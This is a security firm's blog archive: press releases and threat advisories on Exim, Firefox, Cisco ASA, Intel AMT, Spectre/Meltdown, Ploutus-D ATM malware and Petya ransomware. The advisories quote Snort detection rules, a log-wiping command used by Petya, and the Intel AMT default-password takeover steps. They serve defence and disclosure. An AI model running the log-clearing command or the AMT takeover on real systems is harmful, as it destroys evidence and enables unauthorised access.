GuidePoint Security Recognized for Excellence in Managed IT Services

CRN®, a brand of The Channel Company, has named GuidePoint Security to its 2018 Managed Service Provider (MSP) 500 list in the Security 100 category. This annual list recognizes North American solution providers with cutting-edge approaches to delivering managed services. Their offerings help companies navigate the complex and ever-changing landscape of IT, improve operational efficiencies, and maximize their return on IT investments.

In today’s fast-paced business environments, MSPs play an important role in helping companies leverage new technologies without straining their budgets or losing focus on their core business. CRN’s MSP 500 list shines a light on the most forward-thinking and innovative of these key organizations.

The list is divided into three categories: the MSP Pioneer 250, recognizing companies with business models weighted toward managed services and largely focused on the SMB market; the MSP Elite 150, recognizing large, data center-focused MSPs with a strong mix of on-premises and off-premises services; and the Managed Security 100, recognizing MSPs focused primarily on off-premise, cloud-based security services.

GuidePoint Security invested in a specialized team that developed our Virtual Security Operations Center (vSOC), to address flaws commonly found with other Managed Security Service Providers (MSSPs). As a result, GuidePoint’s vSOC provides differentiated customer-centric managed security services.

GuidePoint’s vSOC combines advanced detection and response capabilites, threat hunting powered by proprietary machine learning, and experienced security personnel, all provided as a service.

“Managed service providers have become integral to the success of businesses everywhere, both large and small,” said Bob Skelley, CEO of The Channel Company. “Capable MSPs enable companies to take their cloud computing to the next level, streamline spending, effectively allocate limited resources and navigate the vast field of available technologies. The companies on CRN’s 2018 MSP 500 list stand out for their innovative services, excellence in adapting to customers’ changing needs and demonstrated ability to help businesses get the most out of their IT investments.”

“Significant enhancements to our service offerings and processes, as well as the expansion of our vSOC team over the last year enabled GuidePoint to respond to the increased demand for our offerings,” explained GuidePoint’s Director of vSOC Product Development, Robert Vaile. “Our passion around continued innovation, key technology partnerships and world-class customer satisfaction are powerful differentiators for us and will continue to fuel our success.”

The MSP500 list will be featured in the February 2018 issue of CRN and online at

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at:

Exim MTA

vSOC SPOT Report: Exim Remote Code Execution Vulnerability


On March 6th, 2018, a security researcher by the name of Meh Chang of Devcore, a Taiwanese security consulting firm, published a remote code execution vulnerability that is present in the mail transfer agent, Exim. Exim is a mail transfer agent (MTA for short) for Unix servers that was developed at the University of Cambridge. Its use is very widespread, estimated to be used on hundreds of thousands of different servers, and it is the default mail transfer agent on some popular web control panels, such as cPanel. It is also the default mail transfer agent in the Debian and Ubuntu Linux distributions. Due to the widespread use of Exim, we believe this vulnerability is particularly dangerous. The vulnerability was first disclosed to Exim on February 2nd, 2018, and a patch was published on February 10th to resolve this issue. This vulnerability is currently being tracked under CVE-2018-6789.

Attack Details

The attack exploits the Base64 decode function of the Exim MTA. The AUTH function of Exim, in most cases, uses Base64 encoding to communicate with the client. Exim uses a buffer to store the decoded Base64 data. Chang found that it was possible to use a certain invalid Base64 string to cause Exim to allocate less space for the buffer than it consumed, creating a buffer overflow. Normally this buffer overflow is harmless, but it is possible to craft the Base64 string to a certain length to overwrite critical data.

Remote execution is possible depending on the use of the Access Control List (ACL) strings in Exim. Chang found that it was possible to overwrite the ACL strings, and then initiate an ACL Check using the ‘MAIL FROM’ SMTP command. When an ACL Check is performed, any code in these strings will be executed if it encounters ${run{cmd}}.

Potential Impact

There have been no known active exploits or proofs of concept of this vulnerability, but this is expected to change in the days following the disclosure due to the ease of exploiting it. Also, the estimated number of machines affected by this vulnerability is very high. A successful exploit of this vulnerability could allow the attacker to gain full access to the mail server. This could then be used to compromise privileged information through the use of reading emails, or the copying, modifying, sending, or deleting of email. This server can then be used as a launching point for further attacks within your network. Even if you are not using Exim within your environment for mail, you could still be vulnerable if Exim is installed and there are open SMTP ports that allow incoming mail.

What You Should Do

Exim has already published Exim 40.9.1 to fix this vulnerability. ALL versions of Exim prior to 40.9.1 are vulnerable to this. Patches are available for Debian, Fedora, SuSE, and Ubuntu Linux distributions as standard packages. Some vulnerability scanners have already added checks for this vulnerability, such as Qualys, Rapid7 and Tenable. We would recommend you review your environment for any indication of vulnerable mail servers and ensure these are updated

GuidePoint’s vSOC will provide additional information as it is made public to help protect our clients.

Supporting Information

GuidePoint Security recognized as recipient of 2018 Splunk Partner+ Awards

GuidePoint Security Named Global Partner of the Year and Americas Partner of the Year for Outstanding Performance

HERNDON, VA – March 5, 2018 – GuidePoint Security, a cybersecurity company that provides world-class solutions, today announced it has received the Splunk 2018 Global Partner of the Year award as well as the Americas Partner of the Year award, for exceptional performance and commitment to the Splunk® Partner+ Program. The prestigious Global Partner of the Year and Americas Partner of the Year awards recognize the Splunk partner who has demonstrated the ability to find and lead incremental business with a continued commitment to their partnership with Splunk. Learn more about the Splunk Partner+ Program here.

The Splunk Partner+ Awards are designed to recognize members of the Splunk ecosystem for industry-leading business practices and dedication to constant collaboration. Areas of consideration for an award include commitment to customer success, innovative program execution, investment in Splunk capabilities, technology integrations and extensions, and creative sales techniques.

“We’re honored to receive such prestigious awards,” GuidePoint Security Co-Founder and Principal Justin Morehouse noted. “It’s a testament to the strong partnership our two organizations developed over several years. Beyond our capabilities to provide Splunk certified professional services, our strategic partnership is supported by GuidePoint’s vSOC Managed Security Services, which continues to disrupt the MSS industry,” Morehouse added.

“As a vital partner to Splunk, we applaud GuidePoint Security for being recognized as the Global Partner of the Year and the Americas Partner of the Year, said Cheryln Chin, vice president of Global Partners, Splunk. “The Splunk Partner+ Awards recognize partners like GuidePoint Security who exemplify the core values of the Partner+ Program coupled with a strong commitment to growth, innovation and customer success.”

Winners of the Splunk Partner+ Awards reflect the top-performing partners globally and regionally. All award recipients were selected by a group of the Splunk executives and global partner organization. Read more about the Splunk Partner+ Program.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at:


vSOC SPOT Report: Mozilla Firefox Arbitrary Code Execution Vulnerability


On January 29th, Mozilla developer Johann Hofmann reported that there was a major Arbitrary Code Execution vulnerability (CVE-2018-5124) within the browser’s user interface (UI) that allows a remote attacker to execute specially crafted code by exploitation of the unsanitized HTML output in the browser’s “Chrome” component. The UI vulnerability has received a CVSS score of 8.8 out of 10 due to the ability for it to be easily exploited without the user’s knowledge.

Technical Overview

The attacker hides unsanitized HTML code within the Firefox “Chrome” component, which does not run separately from the HTML present on a web page. If the attacker hides unsanitized HTML inside the browser’s UI code, the execution chain can be broken away from Firefox’s UI component and allow commands to be run on the computer. The code itself runs with whatever the current user’s privileges are. For example, if the user is an administrator then the code can run SYSTEM level commands. Due to the fact CVE-2018-5124 relies on running untrusted code, it has the ability to be hidden within an iframe, loaded-off screen, or loaded via a drive-by download without the user’s knowledge.

Potential Impact

Exploit kit developers are expected to jump on this vulnerability and add CVE-2018-5124 to their arsenal of targeted vulnerabilities in order to load malware on users’ machines. The biggest impact would come from exploitation of this flaw involving a user with administrative privileges and could allow an attacker to gain a foothold due to the factors involving this vulnerability by running SYSTEM level commands on the compromised system. This security flaw allows an attacker to easily deliver malware and potentially gain control over the user’s machine. This vulnerability is not currently known to affect Firefox for Android and Firefox 52 ESR.

What You Should Do

It is recommended that users update their version of Mozilla Firefox if it is one of the following versions:

  • Mozilla Firefox 56.x
  • Mozilla Firefox 57.x
  • Mozilla Firefox 58.0.0

Mozilla has fixed the flaw by sanitizing the code executed by its chrome UI component, and this is included as part of the new patch released for the vulnerable versions.

Supporting Information


vSOC SPOT Report: Ploutus-D ATM Malware


On Friday, January 26th, vendor Diebold Nixdorf released a statement to customers housing their front load ATM appliances of an attack being leveraged against them. The Ploutus-D malware, which has previously been seen in Latin America, has been observed in several regions of the United States including the Pacific Northwest, Texas, and several locations across the Southeast. The attack is coined “Jackpotting” due to the ability to make the ATM device unload all of its funds.

Attack Details

In order for an attacker to gain access to implant the malicious binary, they must have physical access to the device. They must open the top hat of the ATM via a clone key, picking, forcing the lock or any other method. Once they gain physical access, the attacker will attach a USB or PS/2 keyboard and either load the malicious binary via USB drive or other removable media or will replace the hard drive of the system with one preloaded with the malicious operating system and program files. Once complete, this will allow the attacker to “jackpot” the ATM directly via command line or remotely via SMS text message.

Recognizing Jackpotting Attacks

Physical access is necessary to perform this attack as well as potential damage to the device. Routine sweeps should be made by the device administrator to ensure there is no damage to the locking mechanism, top hat, or casing indicating that the device has been tampered with. Additionally, if the device has a built-in tamper alarm to the opening of the top hat, it should be enabled.


Image 1: Hole drilled into ATM for endoscope – Courtesy of EuroPol

Keyboard Attached to ATM

Image 2: Top hat removed and Keyboard attached – Courtesy of FireEye

How Jackpotting Works

The attacker gains physical access to the computer inside the ATM either via forcing the top hat, or in the case of embedded systems, via social engineering their way into the maintenance area for the devices. They then load the Ploutus-D Configuration utility (AgilisConfigurationUtility.exe) along with software dependencies onto the system which permits the attacker control. Once the applications are installed, the malware hooks into the keyboard and permits the use of the “F” function keys (typically at the top of the keyboard, as in the above image) as well as the number keys to provide input. At this point, the attacker can press the “F3” key and distribute funds from the device without authorization or can close everything back up and create a cash drop where they are able to distribute funds at their leisure.

In order for this particular attack to be successful, the attacker MUST have the 8 digit activation code, which is only valid for 24 hours.

Attack Detection and Prevention

To detect and prevent this attack, the best starting point is to reinforce the device’s physical security. Additional security controls for ATM maintenance and stronger access control are critical. Additional options to reduce the attack surface are:

  • Many of the ATMs in circulation use the same keys. Replacing the top hat lock with a different lock will reduce the instances of this crime.
  • Have a technician physically inspect the device at regular intervals to ensure it has not been tampered with.
  • Use appropriate locking mechanisms to secure the head compartment of the ATM.
  • Control access to areas used by personnel to service the ATM.
  • Implement access control for service technicians based on two-factor authentication.
  • Use firmware with the latest security functionality.
  • Use the most secure configuration of encrypted communications including physical authentication:
    • Agilis® XFS for Opteva®
    • Advanced Function Dispenser (AFD) Version 4.1.41 incl.AFD Application Firmware Version – (or later)
    • Agilis® XFS for Opteva®, Core Version 4.1.59 (or later)
    • Optional – OSD+/DSST 3.3.30 (or later)
  • Investigate suspicious activities such as deviating or non-consistent transaction or event patterns, which are caused by an interrupted connection to the dispenser.
  • Have a plan in place for what to do if someone has physically tampered with the ATM.
    • Who is the point of contact?
    • Who is your local law enforcement agency?
    • Do you have a regular contact there?
  • Running regular updates and ensuring that your operating system is still supported (Many of these attacks are made far easier due to the ATM running Windows XP).
  • Implementation of full disk encryption and encrypt the connection between the ATM and the dispenser.

Affected Systems

  • Diebold Nixdorf Front-load Opteva terminals with the Advanced Function Dispenser (AFD).
    • Opteva 500 and 700
  • Other terminals and ATM vendors without physical authentication could be affected.


The following IOCs are available to detect the instance of the attacker:

  • [D-Z]:\Data\P.bin
  • C:\Diebold\EDC\edclocal.dat

The following files should be found at the same place where the service Diebold.exe is located:

  • Log.txt
  • Log2.txt
  • P.bin – Mac address of the system, plus string: “PLOUTUS-MADE-IN-LATIN-AMERICA-XD”
  • PDLL.bin – Encoded version of P.bin
Mutex names:
  • Ploutos
  • KaligniteAPP
  • Service Name: DIEBOLDP

\\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=”Diebold.exe,%system32%/userinit.exe”

Additional Resources

Cisco Logo

vSOC SPOT Report: Cisco Adaptive Security Appliance RCE & Denial of Service Vulnerability

Update (2018-01-31): SNORT Signatures

After further research, vSOC has located Snort signatures published by the fox-srt team, which can detect exploitation of this vulnerability.

# IDS signatures for

alert udp any any -> any 500 (msg:"FOX-SRT - Suspicious - Possible Fragmented Cisco IKE/isakmp Packet HeapSpray (CVE-2018-0101)"; flow:to_server; content:"|84|"; offset:16; depth:1; content:"|02 08 |"; distance:1; within:2; fast_pattern; byte_test:4,>,5000,4,relative; byte_test:2,>,5000,10,relative; byte_extract:4,36,fragment_match; byte_test:4,=,fragment_match,52,relative; byte_test:4,=,fragment_match,136,relative; byte_test:4,=,fragment_match,236,relative; threshold:type limit, track by_dst, count 1, seconds 600; classtype:attempted-admin; sid:21002339; rev:4;)

alert udp any any -> any 500 (msg:"FOX-SRT - Exploit - Possible Shellcode in Cisco IKE/isakmp - tcp/CONNECT/"; content:"tcp/CONNECT/"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 600; priority:1; classtype:attempted-admin; sid:21002340; rev:2;)

These alerts have been provided by fox-srt and can be found at their GitHub site:


On Monday January 29th, Cisco released a statement to customers that they had identified a vulnerability (CVE-2018-0101) affecting Cisco ASA (Adaptive Security Appliance) and Cisco Firepower Threat Defense Appliances via the Secure Sockets Layer (SSL) VPN functionality of the devices which could allow an unauthenticated remote attacker to create a denial of service condition by reloading the device to remotely execute specially crafted malicious code. The vulnerability is due to an attempt to double free a region of memory when the webvpn feature is turned on for the Cisco ASA device.

Attack Details

The vulnerability makes this very easy to exploit and as a result, it was rated a 10 out of 10 on the CVSS (Common Vulnerability Scoring System). The attack involves an attacker sending multiple crafted malformed XML packets to the Cisco ASA devices and Cisco Firepower software. If the exploit is successful, the attacker will then have the ability to execute unauthorized code on the devices. Depending on the nature of the code, the attacker can gain full control over the device. This attack does not require physical access and can be carried out remotely. The ASA device(s) are only vulnerable if they have the webvpn feature enabled within the OS settings.

Attack Detection and Prevention

Attack patterns will vary once exploits are developed and used in the wild. Some possible detection methods include monitoring XML packets sent to Cisco ASA hosts via packet capture, or to monitor for sudden regular spikes in traffic sent to Cisco ASA hosts, as these spikes would likely be an attempt to force constant restarts on the device. To determine whether the webvpn service is enabled, administrators can use the command show running-config webvpn at the command line. Additionally, the show version command can be run to verify which version of Cisco ASA Software is running on the device. The Cisco Adaptive Security Device Manager (ASDM) can also show the software release in the table that appears by the login window, or in the upper-left corner of the ASDM interface.

The show version command will also show the release version for Cisco Firepower Threat Defense (FTD) devices. Version 6.2.2 of FTD devices are vulnerable because it incorporates code from both Firepower and ASA devices, as it was the first release that supported the Remote Access VPN feature.

Affected Systems

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software


Cisco has released several tables showing the versions to update to and the original ASA major release. It is recommended to ensure both the ASA devices and FTD software is updated to the version released to counteract the vulnerability.

Cisco ASA Major Releases

[1] Cisco ASA Major release table (Cisco, 2018)

Cisco FTD Major Relases[1] Cisco FTD Major release table (Cisco, 2018)


There are no workarounds for this vulnerability. However, Cisco has already released updates that address this vulnerability. Versions that include this fix are listed in the ASA Major release table above.

Additional Resouces

Intel AMT

vSOC SPOT Report – Intel AMT Vulnerability


On Friday, January 12th, 2018 researchers at F-Secure disclosed a vulnerability involving Intel’s Active Management Technology (AMT) firmware. The vulnerability can allow an attacker with physical access for as little as 30 seconds to gain full remote access to the machine.

This bypasses operating system logins, BIOS, TPM, BitLocker and local firewall credentials. Mitigation primarily involves disabling AMT or changing the AMT default credentials, which are different from that of the BIOS and the OS.

Technical Overview

Intel’s Active Management Technology (AMT) is a feature built into Intel processors that use vPro, as well as in machines using processors from their Xeon line. This limits the effect primarily to enterprise-grade workstations and servers.

The vulnerability was discovered in July of 2017 by F-Secure’s Harry Sintonen, however, it was not disclosed until the morning of January 12th, 2018. A timeline of events between discovery and disclosure can be found on his website.

Attackers can access the machine by pressing ctrl-p during the machine’s boot-up sequence to access the boot menu. From there all that’s required is to navigate to and select  “Intel(R) Management Engine BIOS Extension (MEBx)”, select “MEBx” login and type in the default password of “admin”.  Additionally, if USB provisioning has not been disabled it’s also possible to carry out the attack automatically with a properly setup and configured flash drive.

Once MEBx has been entered via the boot menu, the intruder can then change the default password and enable remote access. While ethernet access will be available “right out of the box,” wifi access is not enabled by default. However, this can be easily set with a few changes to the wireless management once ethernet access has been established. Configuring the machine to reach out on it’s own is also possible via Client Initiated Remote Access (CIRA). This means that the system can still be accessed from any network on which the client can send outbound data through the firewall.

Potential Impact

All Intel processors that utilize vPro software or possess an Intel Xeon processor are potentially vulnerable. The exception to this seems to be Asus laptops or those that have been specifically configured to request a BIOS password before allowing access to the AMT MEBx extension.

A list of all vPro systems and manufacturers is available from Intel’s website here: Unfortunately, there does not seem to be an equivalent resource for those machines containing Xeon processors.

What You Should Do

Mitigation primarily involves one of two aspects, the first of which being to disable AMT altogether, however, this is not possible in some business contexts depending upon how reliant the organization is on AMT facilitated services.

The second method of mitigation is to go in and manually set a password for AMT. This provides some measure of protection, however, it can still be bypassed by performing a CMOS reset. This is generally done by removing and replacing the CMOS battery, or shorting a jumper on the motherboard, which essentially turns the CMOS memory “off and back on again”. Simply turning off the host does not affect the CMOS.

This is still recommended if AMT cannot be disabled as it significantly increases the amount of time and difficulty for an attacker to successfully carry out the attack, reducing the likelihood of a successful compromise happening unnoticed in a public place, such as through the proverbial “evil maid” attack.

It’s also worth noting that some vulnerability and system management tools also often collect data and statistics such as hardware information. This could be useful for identifying how many and which machines may be vulnerable to the attack.

GuidePoint’s vSOC will provide additional information as it is made public to help protect our clients.

Supporting Information

vSOC SPOT Report – Spectre and Meltdown


On January 1st, 2018 Intel disclosed a critical alert around a large variety of Intel CPUs that allows an attacker to read memory belonging to other processes. Further details from Google Project Zero, Cyberus Technology private researcher Paul Kocher, and various universities surfaced January 3, including white papers. The vulnerabilities are named Spectre and Meltdown. Numerous other names also circulated in the press and on social media, including Meldown [sic], KAISER, KPTI, and FUCKWIT [sic].

Spectre has been assigned CVEs CVE-2017-5753 and CVE-2017-5715. Meltdown has been assigned CVE CVE-2017-5754. Some elements of Spectre, at least for the moment, cannot be mitigated in software.

The flaws affect Intel CPUs produced after the original Pentium (P5 architecture), with the exception of Itanium and pre-2013 Atom CPUs, on all operating systems that run on the x86 and x86-64 architecture, including but not limited to Microsoft Windows, Linux, Mac OS X, and embedded systems using Intel CPUs.

AMD states its CPUs are immune to Meltdown but some researchers report Spectre works on AMD CPUs. AMD CPUs achieved a degree of acceptance in the 2005-2010 timeframe in enterprises but are much less common in enterprise environments than Intel.

Additionally, ARM has stated its high-end Cortex CPUs are vulnerable to Spectre. Apple uses ARM-based CPUs in its iPhone and iPad products but has not released a statement regarding their vulnerability or immunity to this flaw. Devices based on Google Android and Chrome OS also use ARM. Google has released patches but in some cases the patch has to be released by the device manufacturer and/or the carrier.

Linux vendor Red Hat states a the Spectre condition exists in IBM System Z, Power 8, and Power 9 CPUs.

This vulnerability was privately disclosed to Intel and operating system vendors, but security researchers working independently have developed proof of concept code. In a statement released on January 3, Intel stated it is working with AMD and ARM, as well as with major operating system vendors, on fixes.

Microsoft released emergency patches for supported versions of Windows on January 3, and is patching Azure on an accelerated schedule. Microsoft has not stated if end-of-life systems such as Windows Vista, Windows XP, and Windows Server 2003 will be included. Apple included fixes in macOS 10.13.2, and plans more fixes in macOS 10.13.3 by the end of the month. Google addressed the issue on Android and Chrome OS in its January 2018 security patch.

Patches for Linux are in work. Amazon has released patches for Amazon Linux. Customers can roll the patch to existing AMIs; new AMIs automatically have the patch in place. Red Hat has released patches for some versions of Red Hat Enterprise Linux, with patches for the other supported versions in work. Intel’s initial recommendation regarding Linux was incomplete.

Security researcher Erik Bosman released proof of concept code on Twitter on January 3. The original researchers will release their proof of concept code after security patches are released, including code that demonstrates stealing passwords.

Technical Overview

KPTI (Kernel Page Table Isolation) is a technique to isolate kernel code from userspace, so that the code is accessible, but only indirectly. It is a key security feature in modern CPUs and operating systems. Userspace is able to make calls to the kernel even though it does not know where it exists in memory. KAISER refers to a flaw that permits an attacker to defeat these measures and jump from CPU ring 3 (where user applications run) to ring 0 (where the kernel runs).

The exploit works by taking advantage of speculative execution. When faced with a branch in program flow, modern Intel CPUs will execute both possibilities, so it has the results ready ahead of time, and simply discard the result it didn’t need. Under some conditions, such speculative code runs with fewer security measures than normal code. The exploits take advantage of this unusual condition to bypass the CPU’s normal security measures. There are three conditions under which this can occur, not all of which are present in all affected CPUs.

Early reports had suggested this was a way to overwrite code. Intel has stated it only makes it possible for a process to read memory belonging to a different process.

Potential Impact

This vulnerability can be potentially exploited to defeat ASLR and KPTI on affected systems and read memory contents belonging to other processes running on the machine. At this point, the most useful scenario for an attacker would be to use it to steal passwords, credit card numbers, or other sensitive but succinct data from memory. On desktops and laptops, it can be exploited remotely via JavaScript residing on a web page. It could also be used in cloud environments to cross over into other virtual machines and steal data belonging to other customers.

The patches for this flaw may prove to be unpopular due to early reports stating to expect performance hits ranging from 5-30 percent. Reports from the field indicate 20% is a more common worst-case scenario on database and web servers. On desktops, the performance impact generally is minimal.

What Should You Do

Having a complete inventory of IT systems is critical for addressing vulnerabilities such as this one, including hardware make and model, CPU architecture, and operating system.

Scan your network for CVE-2017-5753, CVE-2017-5715, and CVE-2017-5754. Apply any applicable patches. Keep in mind some fixes will not be available until later in the month. If your vulnerability management solution permits, scan your Mobile Device Management platform to ensure you are running post-January 2018 versions of Android. Workstations and virtual machines in cloud environments, which have the greatest exposure to the outside world, should have the highest priority when deploying patches. Servers running on virtual infrastructure under your control will be harder to exploit.

There are some caveats to patching Windows for this vulnerability. A Microsoft article on compatibility issues between this patch and certain third-party antivirus solutions is included in the Supporting Information section at the end of this document. GuidePoint recommends you confirm with your antivirus vendor that its solution is compatible with Microsoft’s update for Spectre and Meltdown. As GuidePoint learns more regarding antivirus compatibility or lack thereof, we will post updates on our blog at

Furthermore, under some conditions, the update for Windows 10 can throw a false error message stating that it failed when it succeeded. Follow up patching efforts with scanning from your vulnerability management solution to validate that patches actually did apply and are no longer vulnerable.

Slowdowns, although initially overstated, still have the potential to occur. The effect on workstations will be minimal. Servers that perform heavy I/O, such as web servers and databases, will incur more significant performance hits. GuidePoint recommends testing any applicable patches for performance impact before upgrading web farms. Be prepared to update software such as Apache that may need revisions to work around performance issues introduced by these security updates.

GuidePoint also recommends you advise your employees to update their personal computers and devices, with the caveat that your IT department is not responsible for providing support. Microsoft provides free support for home users of Windows who experience difficulty related to applying security patches.


GuidePoint leverages Splunk and Crowdstrike to automate critical security operations for customers

Find more than just an MSSP; find a partner

Today, organizations are scrambling to find managed security services providers (MSSPs) who can combat the shortage of qualified cybersecurity personnel available. Enterprises that have moved operational components of their security programs to MSSPs (e.g. management of on-premise or cloud-based Security Incident and Event Management Systems (SIEM)), often express disappointment with the value that typical MSSPs provide. Because most traditional MSSPs consider it their core function to forward alerts at a certain threshold to the customer for treatment, widespread complaints by organizations are growing – claiming that noise emanating from their MSSPs require as much manpower as managing their SIEM in-house. As such, these MSSPs are not adequately addressing the needs of their customers.

GuidePoint Security focuses its solution development on addressing these needs. Instead of reworking a failed model, GuidePoint brings Advanced Security Operations to our customers through a combination of best-in-class practices and technologies. Instead of simply forwarding alerts from customer SIEM environments, GuidePoint’s vSOC managed security service validates every alert to ensure that each threat is real. By doing so before taking further action or alerting our customers, customers save time and resources in tracking down false-positives.

Leveraging its partnership with CrowdStrike and Splunk, GuidePoint’s vSOC recently developed the capability to automate critical security operations functions including detection, hunting and remediation. Together, the advanced capabilities of both the Splunk platform and Crowdstrike’s Falcon Platform, allow customers to trust GuidePoint’s vSOC (and their skilled analysts) to alert them once an incident has been detected, validated and remediated. This practice offloads these processes from our customers’ security teams and allows them to focus on other tasks requiring their unique context and expertise, providing real value to our customers.

Interested in learning more? GuidePoint Security has a booth at .conf2017: the 8th Annual Splunk Conference, in Washington DC, Sept. 25-28th. Drop by and see us at the conference for a live Advanced SecOps demo.

Stay tuned for future blog posts on the coming solutions GuidePoint’s vSOC uses to provide customers with Advanced Security Operations – virtually.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at:


Robert Vaile – GuidePoint Security’s Director for vSOC Product Development

vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware were actually indicators belonging to the second campaign which is aptly being called, NotPetya.

Exploitation of the CVE-2017-0199 the myguys.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Due to our goal of reporting accurate information in a timely manner some of the original information included in our SPOT report and blog post was misattributed to the NotPetya/Loki campaign that was running simultaneously. The difference in these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has been made available.

2017-06-27 17:55 EDT

Several different security researchers have identified a method of preventing the encryption of the disk by using any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This method does not stop the spread of the malware, just halts the encryption functions.

As of 1730 EDT the email provider for the attacker’s email has closed the account. This affects the ability to pay the ransom if you are infected. New variants may provide a new method of payment.

2017-06-27 15:31 EDT

Connections to the initial outbreak of the Petya ransomware has been correlated to a compromised accounting software, MeDoc, popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release which helped propagate the ransomware to many different companies. The update was released at 10:30AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged in user are not sufficient enough to write to the Master Boot Record (MBR) the malware will attempt to encrypt files based on their extension like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to prevent further analysis using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

To further protect vulnerable systems it is advised to disallow the execution of the psexec.exe program if it is not needed or to disallow non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling Administrative Shares via Group Policy Object (GPO). To disable ADMIN$ shares use the below process:

Create a file named adminshares.adm with the content from below, under C:\windows\inf on the server you edit your GPO’s with.

CATEGORY !!category1 
CATEGORY !!category2 
POLICY !!policyname 
EXPLAIN !!DefaultSharesExplain 
KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\" 
VALUENAME "AutoShareWks" 
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled" 


Next, create a new GPO and right click on administrative templates, and add the administrative template you just created.

Click machine administrative templates, go into view filtering, unselect/uncheck “Only show policy settings that can be fully managed” the setting is shown in the top picture. Basically this allows the GPO Editor to show settings, that is not within the default area of registry “preferences” – like ours. Any settings done outside “preferences” will persist if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares.

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contain new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecomms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the exact same EternalBlue exploit that the WanaCrypt0r malware used in May 2017; attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after being allegedly stolen from the National Security Agency (NSA) in April 2017.

